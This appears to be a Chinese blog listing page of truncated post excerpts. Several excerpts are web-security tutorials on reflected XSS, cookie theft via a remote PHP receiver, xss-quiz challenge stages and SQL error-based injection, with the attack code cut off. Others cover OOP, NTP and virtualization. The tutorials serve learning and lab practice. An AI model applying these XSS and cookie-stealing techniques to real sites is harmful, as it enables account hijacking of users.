1.1 反射型XSS攻击劫持用户浏览器 1.1.1 构造攻击payload [cce lang='bash']<script> window.onload = function() { var link= document.getElementsByTagName('a'); for(j = 0; j < l...

1.1 窃取用户cookie信息保存到远程服务器 1.1.1 构建钓鱼网站接收cookie 页面中创建cookie变量，然后将cookie变量写入cookie.txt [cce lang='bash']# vim /var/www/html/diaoyu.php <?php $c...

1.1 Stage 5 限制输入长度注入XSS http://xss-quiz.int21h.jp/stage--5.php?sid=4558a6085bab4b45184aab2e57fb77ae14e96786 1.1.1 页面分析 1.1.1.1  分析过程 提示信息：文本框长度限制 查看...

1.1 Stage 9 UTF-7编码注入XSS http://xss-quiz.int21h.jp/stage_09.php?sid=e65bbb1a82573cd9e16ad710a7d7a259226deecf 因为现在都使用UTF-8编码且没有ie7的环境而且当前漏洞在实际场景中几乎...

1.1 反射型XSS 这个功能类似一个留言板， 输入信息后下面会增加对应的信息。 1.1.1 原理演示 1、输入文本信息后页面汇总会添加我们输入的文本信息： 2、根据4中回显信息判断出显示的文本内容是H...

第1章 面向对象介绍 1.1 面向对象与面向过程的区别 1.1.1 面向过程 面向过程的程序设计的核心是过程（流水线式思维），过程即解决问题的步骤，面向过程的设计就好像精心设计好一条流水线，考虑...

1.1 SQL注入方法 1.1.1 报错注入 ORDER BY关键词用于对记录集中的数据进行排序。 用法1：按某个字段进行排序，语法： [cce lang='bash']select字段1,字段2 from表名order by字段名;[/cce] 用法2...

第1章 NTP服务介绍 1.1 使用NTP服务的原因 时间对服务器之间的通信及信息交流非常的关键， 一般情况我们可以同步公网的时间服务器，例如ntp1.aliyun.com，但是当机器比较多（百台或千台）同步公...

第1章 虚拟化技术的演变过程 1.1 软件模拟 软件模拟理论上可以模拟任何硬件，甚至是不存在的硬件。但是因为这种方式全部是模拟硬件，所以非常低效，一般只用于研究测试场景。采用这种技术的典型...

本资源转载自网络；资源存储网盘并非本人所有，失效本人无法补档；主题所有者也不必联系本人删除相关资源与文章，我的站发布什么我说了算，不要用道德绑架本人。我的领地我说了算。 主题介绍：h...